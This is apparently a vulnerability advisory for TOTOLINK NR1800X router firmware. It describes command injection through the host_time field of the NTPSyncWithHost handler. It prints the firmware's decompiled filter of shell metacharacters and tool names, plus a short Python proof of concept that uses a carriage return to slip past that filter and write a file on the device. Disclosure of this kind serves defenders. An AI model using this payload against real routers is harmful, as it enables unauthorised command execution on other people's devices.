Overview

• Manufacturer's website information：https://www.totolink.net/
• Firmware download address ：https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/ids/36.html

Affected version

NR1800X_Firmware V9.1.0u.6279_B20210910

Vulnerability details

In the NR1800X_Firmware V9.1.0u.6279_B20210910 has a command injection vulnerability in the NTPSyncWithHost function. The Var variable receives the host_time parameter from a POST request. However, since the user can control the input of host_time, the telnet service can cause a command injection vulnerability.

BOOL __fastcall Validity_check(int a1)
{
  return strchr(a1, 59)
      || strstr(a1, ".sh")
      || strstr(a1, "iptables")
      || strstr(a1, "telnetd")
      || strchr(a1, 38)
      || strchr(a1, 124)
      || strchr(a1, 96)
      || strchr(a1, 36)
      || strchr(a1, 10) != 0;
}

POC

import requests
url = "<http://192.168.153.2/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"SESSION_ID=2:1773363743:2"}

payload = 'a'*0x1000
data = {"host_time":"2024'\\x0decho hacker>/www/123.txt\\x0d'","topicurl":"NTPSyncWithHost"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)